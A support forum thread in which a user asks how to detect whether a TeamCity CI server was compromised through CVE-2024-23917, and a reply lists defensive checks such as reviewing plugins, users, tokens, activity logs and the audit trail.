Is there any way to find out if CVE-2024-23917 has been exploited?
Hi,
I'd like to know if a given CI server has been compromised by the recent TeamCity vulnerability described at
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23917
Obviously an attacker could hide any traces once he has gained full control of the system, but supposing that is quite sloppy, is there any way to find out whether or not this has been exploited?
Thanks in advance for your help.
Please sign in to leave a comment.
There are no unknown internal properties under Administration - Diagnostics, or in the internal.properties file in the data directory.
There are no unknown plugins, can be verified both in the UI’s Administration - plugin list as well as in the data directory, plugins subfolder
There are no unknown tools, can be verified both in the UI’s Administration - Tools as well as in the data directory, plugins/.tools subfolder
Projects and/or build configurations that the attacker could have created
Any additional unknown users that might have been created
Known users, particularly admin users don’t have unknown tokens. This was one of the most common approaches for attacks, so removing all tokens and recreating those you might use would be ideal.
The teamcity-activities.log can contain information of some of the scripts and commands run by attackers.
The audit feature (under Administration - Audit) can contain information about certain actions happening on the server. It should contain information on project and user changes, so you can use it to identify possible changes performed by the attacker.
If you believe your server has been compromised, please don't hesitate to send us a request via the Submit a request button on the top of the page, and consider the possibility of hiring a cyber security forensics specialist to dig deeper into your personal setup and try to identify issues.